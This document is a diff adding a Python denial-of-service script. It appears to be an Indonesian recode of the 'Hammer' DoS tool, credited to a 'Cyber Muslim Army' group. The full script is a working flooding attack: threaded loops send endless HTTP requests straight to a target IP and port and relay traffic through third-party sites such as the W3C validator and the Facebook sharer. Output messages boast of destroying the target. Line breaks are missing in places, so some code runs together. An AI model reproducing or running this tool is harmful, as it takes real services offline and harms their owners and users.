-0,0 +1,179 @@#!/usr/bin/python3# -*- coding: utf-8 -*-
# Script ini recode dari 
# python 3.3.2+ Hammer Dos Script v.1
# by Can Yalçın
# HAMBA-ALLAH
# ALLAH
# CYBER MUSLIM ARMY NEW - MCAN
# TEAM REPORT DDOS MCAN
# ALL SUPPORT MY BEST FRIENDS

from queue import Queuefrom optparse import OptionParserimport time,sys,socket,threading,logging,urllib.request,random
def user_agent():	global uagent	uagent=[]	uagent.append("Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14")	uagent.append("Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:26.0) Gecko/20100101 Firefox/26.0")	uagent.append("Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3")	uagent.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)")	uagent.append("Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7")	uagent.append("Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)")	uagent.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1")	return(uagent)

def my_bots():	global bots	bots=[]	bots.append("http://validator.w3.org/check?uri=")	bots.append("http://www.facebook.com/sharer/sharer.php?u=")	return(bots)

def bot_hammering(url):	try:		while True:			req = urllib.request.urlopen(urllib.request.Request(url,headers={'User-Agent': random.choice(uagent)}))			print("\033[94mHAMBA-ALLAH menghancurkan target...\033[0m")			time.sleep(.1)	except:		time.sleep(.1)

def down_it(item):	try:		while True:			packet = str("GET / HTTP/1.1\nHost: "+host+"\n\n User-Agent: "+random.choice(uagent)+"\n"+data).encode('utf-8')			s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)			s.connect((host,int(port)))			if s.sendto( packet, (host, int(port)) ):				s.shutdown(1)				print ("\033[92m",time.ctime(time.time()),"\033[0m \033[94m <--HAMBA-ALLAH menghancurkan target !--> \033[0m")			else:				s.shutdown(1)				print("\033[91mBerhenti<->ah\033[0m")			time.sleep(.1)	except socket.error as e:		print("\033[91mtarget hancur HAMBA-ALLAH MENANG takbir.. takbir.. takbir..\\033[0m")		#print("\033[91m",e,"\033[0m")		time.sleep(.1)

def dos():	while True:		item = q.get()		down_it(item)		q.task_done()

def dos2():	while True:		item=w.get()		bot_hammering(random.choice(bots)+"http://"+host)		w.task_done()

def usage():	print (''' \033[92m			serangan HAMBA-ALLAH Dos Script v.1	Pembuat tidak bertanggung jawab jika digunakan untuk melawan hukum.	Script ini recode ke bahasa indonesia dari script Hammer v.1 \n	cara pakai : python3 HAMBA-ALLAH1.py [-s] [-p] [-t]	contoh : python3 HAMBA-ALLAH1.py -s 192.168.0.1 -p 80 -t 135		-h : help	-s : alamat ip target	-p : port target, contoh 80	-t : turbo default nya 135 \033[0m''')	sys.exit()

def get_parameters():	global host	global port	global thr	global item	optp = OptionParser(add_help_option=False,epilog="Hammers")	optp.add_option("-q","--quiet", help="set logging to ERROR",action="store_const", dest="loglevel",const=logging.ERROR, default=logging.INFO)	optp.add_option("-s","--server", dest="host",help="attack to server ip -s ip")	optp.add_option("-p","--port",type="int",dest="port",help="-p 80 default 80")	optp.add_option("-t","--turbo",type="int",dest="turbo",help="default 135 -t 135")	optp.add_option("-h","--help",dest="help",action='store_true',help="help you")	opts, args = optp.parse_args()	logging.basicConfig(level=opts.loglevel,format='%(levelname)-8s %(message)s')	if opts.help:		usage()	if opts.host is not None:		host = opts.host	else:		usage()	if opts.port is None:		port = 80	else:		port = opts.port	if opts.turbo is None:		thr = 135	else:		thr = opts.turbo

# reading headersglobal dataheaders = open("headers.txt", "r")data = headers.read()headers.close()#task queue are q,wq = Queue()w = Queue()

if __name__ == '__main__':	if len(sys.argv) < 2:		usage()	get_parameters()	print("\033[92m",host," port: ",str(port)," turbo: ",str(thr),"\033[0m")	print("\033[94mHAMBA ALLAH melakukan Pengecekan kondisi targer...\033[0m")	user_agent()	my_bots()	time.sleep(5)	try:		s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)		s.connect((host,int(port)))		s.settimeout(1)	except socket.error as e:		print("\033[91mKesalahan : Cek lagi ip and port target\033[0m")		usage()	while True:		for i in range(int(thr)):			t = threading.Thread(target=dos)			t.daemon = True # if thread is exist, it dies			t.start()			t2 = threading.Thread(target=dos2)			t2.daemon = True # if thread is exist, it dies			t2.start()		start = time.time()		#tasking		item = 0		while True:			if (item>1800): # for no memory crash				item=0				time.sleep(.1)			item = item + 1			q.put(item)			w.put(item)		q.join()		w.join()